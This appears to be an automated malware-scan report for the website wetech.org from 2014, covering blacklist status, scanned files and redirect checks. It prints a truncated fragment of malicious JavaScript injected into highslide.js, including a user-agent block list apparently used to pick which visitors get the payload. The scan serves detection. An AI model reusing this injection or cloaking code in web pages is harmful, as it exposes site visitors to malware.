Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wetech.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wetech.org/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wetech.org/ | 200 OK Content-Length: 5455 Content-Type: text/html | clean |
http://wetech.org/mod/jquery/jquery.js | 200 OK Content-Length: 29611 Content-Type: application/javascript | clean |
http://wetech.org/mod/highslide/highslide.js | 200 OK Content-Length: 50145 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (g_haystack, g_needle, g_offset) { var haystack = (g_haystack + '').toLowerCase(); var needle = (g_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, g_offset)) !== -1) { return index; } return false; } function user_agenta(){ var blockLista = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','I if (hs.hideIframes) this.showHideElements('IFRAME', 'hidden', imgPos); }; hs.addEventListener(document, 'mousedown', hs.mouseClickHandler); hs.addEventListener(document, 'mouseup', hs.mouseClickHandler); hs.addEventListener(window, 'load', hs.preloadImages); hs.graphicsDir = './mod/highslide/graphics/'; hs.outlineType = null; window.onload = function() { hs.preloadImages(); } Antivirus reports:
| ||
http://wetech.org/mod/rt_popup/lib.js | 200 OK Content-Length: 3171 Content-Type: application/javascript | clean |
http://wetech.org/js/swfobject.js | 200 OK Content-Length: 9344 Content-Type: application/javascript | clean |
http://wetech.org/js/rollover.js | 200 OK Content-Length: 3407 Content-Type: application/javascript | clean |
http://wetech.org/index.php | 200 OK Content-Length: 5455 Content-Type: text/html | clean |
http://wetech.org/index.php?page=catalog&pid=4 | 200 OK Content-Length: 5879 Content-Type: text/html | clean |
http://wetech.org/index.php?page=catalog&pid=214 | 200 OK Content-Length: 4115 Content-Type: text/html | clean |
http://wetech.org/index.php?page=catalog&pid=215 | 200 OK Content-Length: 4153 Content-Type: text/html | clean |
http://wetech.org/index.php?page=catalog&pid=216 | 200 OK Content-Length: 4135 Content-Type: text/html | clean |
http://wetech.org/index.php?page=catalog&pid=217 | 200 OK Content-Length: 4153 Content-Type: text/html | clean |
http://wetech.org/index.php?page=catalog&pid=218 | 200 OK Content-Length: 4165 Content-Type: text/html | clean |
http://wetech.org/?page=home | 200 OK Content-Length: 5455 Content-Type: text/html | clean |
http://wetech.org/test404page.js | 404 Not Found Content-Length: 288 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wetech.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 08:48:25 GMT
Server: nginx
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: wetech.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 08:48:25 GMT
Server: nginx
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: wetech.org
Referer: http://www.google.com/search?q=wetech.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wetech.org
Referer: http://www.google.com/search?q=wetech.org
Result:
The result is similar to the first query. There are no suspicious redirects found.